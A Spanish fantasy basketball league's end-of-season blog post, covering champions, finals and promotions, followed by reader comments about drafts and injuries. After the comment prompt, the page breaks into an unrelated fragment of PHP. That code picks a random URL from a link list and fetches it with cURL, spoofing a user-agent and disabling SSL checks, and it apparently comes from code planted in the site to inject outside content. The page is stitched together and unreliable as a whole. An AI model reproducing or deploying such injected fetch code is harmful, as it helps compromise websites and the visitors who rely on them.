Resumen de la temporada hoops tjnba 2012/2013

01 de June de 2013 por txusma

2ª edición de la Liga Hoops TJNBA, en esta ocasión con 2 divisiones y un total de 46 participantes. Podemos calificarlo de rotundo éxito y esperar que el curso que viene aún se pueda mejorar.

El campeón de este año en primera ha sido nuestro analista TheDeerHunter, también comisionado de las ligas (¿Sternato?) con un equipo basado en un frontcourt potentísimo formado por Marc Gasol, Joakim Noah y Kenneth Faried, una de las sorpresas positivas del año, Jrue Holiday, y la veteranía de Vince Carter. Las incorporaciones de Mo Williams y Damien Wilkins resultaron puntualmente decisivas.

En la final se imponía a Jarobado, el GM de un equipo con otro juego interior temible formado por Tim Duncan y Al Horford, más JR Smith, Jeff Teague y Isiah Thomas por fuera con Jason Thompson apotando desde el banco. Algunas bajas como Granger o Al Harrington le terminarían pasando factura pero nos dejó el récord de puntuación del curso doblegando en las semifinales a 7 al campeón del año pasado Hopin (AKA Jose_Dantley) que tenía en plantilla a la mejor dupla de bases de la liga (Chris Paul – Damian Lillard) más Jimmy Butler, JJ Hickson y Javale McGee entre otros. 

En la otra semifinal Sancho también dio su brazo a torcer en el 7º ante el a la postre campeón, con un equipo formado por jugadores como Vasquez, Howard e Ibaka pero penalizado por la irregularidad de Ilyasova y Kirilenko. Sin embargo, antes había eliminado a dos huesos como pikerton (Brand, Anderson, LeBron, Conley, Collison…) y Jabho (Lowry, Sessions, Leonard, Josh Smith, Gortat…)

Otros contendientes dignos de mención fueron MagicPepper32 (Dragic, Turner, Harden, Millsap, Vucevic…) que no fue campeón por un quítame allá ese Bynum; Kinetix (Lin, Wade, West, Amir, Nate…), o Viva_Dirk (Irving, George, Barnes, Sanders, Davis…) pero en general el nivel de competición de todos los equipos fue muy alto.

Por su parte, deberán ganarse el próximo curso su vuelta a primera  HisRoyalAirness, Andid, Simon y Sayim… Nuestro querido Melo se salvó finalmente en los despachos.

En segunda, terrible la dictadura del clan Pancorbo, Jose Luis y sus dos hermanos pequeños, que arrasaba en el draft y la regular. Después, las lesiones e imponderables iban a alterar el asunto y el personal se les subía a las barbas en postemporada. Sólo Julio cumplía los pronósticos para ser campeón con un equipo impresionante: Howard, Duncan, Scola, Wade, Hill, Nate, Vince… Por decisión propia los tres volverán a ser el terror de segunda, a no ser que Julio diga lo contrario.

Le plantó cara de la buena en la final, y se le espera en primera, Pow_Brolin reinventándose a sí mismo tras muchas dificultades de inicio. Gran equipo, de menos a más: Lawson, Lin, Thaddeus, Aldridge, Ilyasova, Hawes, Brandon Knight, Wilson Chandler…

El resto de acompañantes al ascenso a primera serán, el semifinalista Lenny1984 y los cuartofinalistas Josgel y Crackomoi desempatando por clasificación en la regular.

Lo dicho, el año que viene más y mejor. Muchas gracias por vuestra participación y enhorabuena a todos por ser tan cojonudos.

Comenta

7 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Joder, nuestra serie Deer fue la hostia en semifinales. Llegamos al séptimo y me ganaste en la última noche si mal no recuerdo, además remontándome y todo un 3-1 (hablo de memoria). No, pero merecidísima victoria, al final incluso con la lesión de Noah apareció Mo Williams liándola todos los días, Jrue Holiday hizo muchísimo daño también, y obviamente el subidón de Marc en el último tercio de temporada fue lo que te catapultó definitivamente al título.

    Mi experiencia este segundo año ha sido muy buena, pero quizá tendría que replantearme mejor la estructura de mi equipo. Marion lo hizo muy bien, pero tenía a Ilyasovias y Kirilenko, que con los minutos de F de Ibaka mejor en PPP que ellos, siempre uno de ellos se quedaba aportando pocos minutos. Luego lo de Vásquez fue potra absoluta, nadie esperaba ese subidón, y luego la cagué intentando arriesgar con Jordan Crawford y Budinger, y me quité al máquina de PJ Tucker…. quien, junto a Beberley, me habría hecho dar mucha guerra en las semifinales. Y luego, Howard bien sin más, el 15 de valoración en la hoops. Lo elegí en el pick 6, menos mal que Magic eligió a Bynum en el 5, porque si no, probablemente esa habría sido mi elección, y mi tumba, obviamente. Por eso también flipo que se diga que la temporada de Howard ha sido una mierda. Vale que esperasemos más, pero ha sido el máximo reboteador de la liga y en ataque ha aprovechado lo que ha podido, las bolas que le han pasado. Ha estado fatal en tiros libres como siempre, pero no ha anotado más por culpa de D’Antoni. Su temporada es meritoria por espalda y hombros. No sé, estoy contento de haberlo pickeado, pero para otro año elegiré mejor en G’s.

    Un placer de temporada, con equipos muy bien hechos, compensados y una competición en general muy igualada. Me gustaría ver al ‘Clan de los Pancorbos’ jejej, en primera liándola.

    Y ya lo digo desde aquí, Melo, el año que viene te robo a Carmelo. Te lo prometo. jejeej 🙂

      Citar

  2. jose_dantley dice:
    #2

    Las semifinales fueron épicas. Un poco deslucidas por el sistema hoops, pero aquella puntuación de Jarobado fue increíble.

    Al final se volvió a demostrar que los nombres importan si están acompañados de números. Deer en ese sentido afinó muchísimo en el draft, muy bueno, con aciertos sobre todo en los que nombra Txus.

    La hoops penaliza mucho los fallos en los picks altos. Magic creo que hizo el mejor draft de todos, peeeeero eligió a Bynum con su primera ronda.

    En lo particular, buena temporada, pero con suerte. Me tocó la peor división, aunque por media hubiera entrado por los pelos. Después del éxito del año pasado, no está nada mal llegar a semis. El riesgo de Lillard me compensó.

    El año que viene se presenta duro porque vienen con ganas los de 2ª

      Citar

  3. Jose Luis dice:
    #3

    Nos lo hemos pasado bomba jajajaja aunque en 2ª mucha gente se quitó muy pronto o abandonó el equipo y así no hay manera.

      Citar

  4. rumbero dice:
    #4

    Jose Luis:
    Nos lo hemos pasado bomba jajajaja aunque en 2ª mucha gente se quitó muy pronto o abandonó el equipo y así no hay manera.

    Este temporada pase, pero queremos al temido clan Pancorbo en primera que ahí siempre hay mucho tela. Yo ya flipé en su momento cuando Deer colgó por el foro como iba el draft de segunda, pero es que el equipo de Julio no me lo explico Howard, Duncan, Scola, Wade, Hill, Nate, Vince…una pasada.
    Estuvo entretenida primera y con bastante nivel la verdad. A nivel particular espero tener algo más de vista y bastante menos de mal fario para esta temporada sino que vayan temblando los elegidos para mi equipo. Mi temporada se puede resumir en pillar a Love en #2 antes que Durant y cambiar a pelo a T. Chandler por Humphries después que el primero no acabara de arrancar y el último se marcara un 13-20 en un partido. Que ojo!

      Citar

  5. Sancho88 dice:
    #5

    Yo mi cagada fue elegir a Ibaka en segunda ronda y ver que justo después… salió Harden, jeje. Pero claro, aún no sabíamos lo del traspaso….

      Citar

  6. suffer dice:
    #6

    ni Lebron pudo salvarme en la 2° jjaja, mi problema fue la falta de un C decente y que J.R smith me fallo en los play off.

    ojala el prox año me tengan en cuenta xD. como siempre he dicho no comento mucho pero siempre los estoy leyendo jaja, saludos y felicidades a ambos campeones y a los de 2° que suben a 1°.

      Citar

  7. Denise dice:
    #7

    Yo a ver si llego a Playoffs, que en 2 años ni lo he olido, a pesar de que en teoría contaba con un gran equipo con Nelson-Iguodala-Deng-Bosh-Aldridge más Matthews, Ray Allen, Odom ó Korver en el banquillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>